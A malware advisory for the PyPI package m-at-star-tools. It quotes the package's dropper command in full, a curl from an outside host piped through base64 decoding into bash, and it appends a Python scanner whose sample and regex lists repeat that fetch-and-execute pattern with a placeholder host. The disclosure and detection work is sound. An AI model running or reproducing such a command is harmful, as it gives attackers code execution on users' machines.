Malicious code in m-at-star-tools (PyPI)
MAL-2026-4812
Published · Modified
Description
Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)
The package's sole console_script m0scan (m0scan/main.py:6-7) executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (mspy.qzz.io) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.
Source: kam193 (1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1)
The package downloads remote encoded code, which then downloads the next encrypted stage. The encryption of final data requires knowing a code.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-m-at-star-tools
Reasons (based on the campaign):
- Downloads and executes a remote malicious script.
- Obfuscation
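Added example, not part of the advisory or of either source's analysis: a small Python scanner that flags the fetch-decode-execute pattern described above (a shell sink whose command string fetches remote content, base64-decodes it and pipes it to an interpreter) in a package's console-script source. The sample source, its host and the signal names are constructed placeholders.

```python
import ast
import re

# Constructed sample mirroring the reported entry point: the script's only job
# is to fetch remote bytes, base64-decode them and pipe them into bash.
# The host is a placeholder, not the one named in the advisory.
SAMPLE_MAIN_PY = '''
import os

def main():
    os.system("curl -sL https://example.invalid/stage1 | base64 -d | bash")
'''

# Constructed benign sample: list-form argv with no fetch or pipe.
BENIGN_PY = 'import subprocess\nsubprocess.run(["ls", "-l"])\n'

FETCHERS = re.compile(r"\b(curl|wget)\b")
DECODERS = re.compile(r"\b(base64\s+(-d|--decode)|openssl\s+enc|xxd\s+-r)\b")
INTERPRETERS = re.compile(r"\|\s*(bash|sh|zsh|python3?|perl)\b")
# Function names that hand a string to a shell or spawn a process.
SHELL_SINKS = {"system", "popen", "run", "call", "check_output", "check_call", "Popen"}

def classify_command(cmd):
    """Return the set of risk signals present in one shell command string."""
    signals = set()
    if FETCHERS.search(cmd):
        signals.add("remote_fetch")
    if DECODERS.search(cmd):
        signals.add("encoded_payload")
    if INTERPRETERS.search(cmd):
        signals.add("pipe_to_interpreter")
    return signals

def scan_source(src):
    """Flag shell-sink calls whose string arguments fetch from the network
    and pipe the result into an interpreter; decoding is reported as extra."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
        if name not in SHELL_SINKS:
            continue
        for sub in ast.walk(node):
            if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
                sig = classify_command(sub.value)
                if {"remote_fetch", "pipe_to_interpreter"} <= sig:
                    findings.append({"line": node.lineno, "cmd": sub.value, "signals": sorted(sig)})
    return findings
```

Run it over every module referenced by a package's console_scripts entry points before installing; a hit on the sole entry point, as here, is the wrapper-is-the-dropper case.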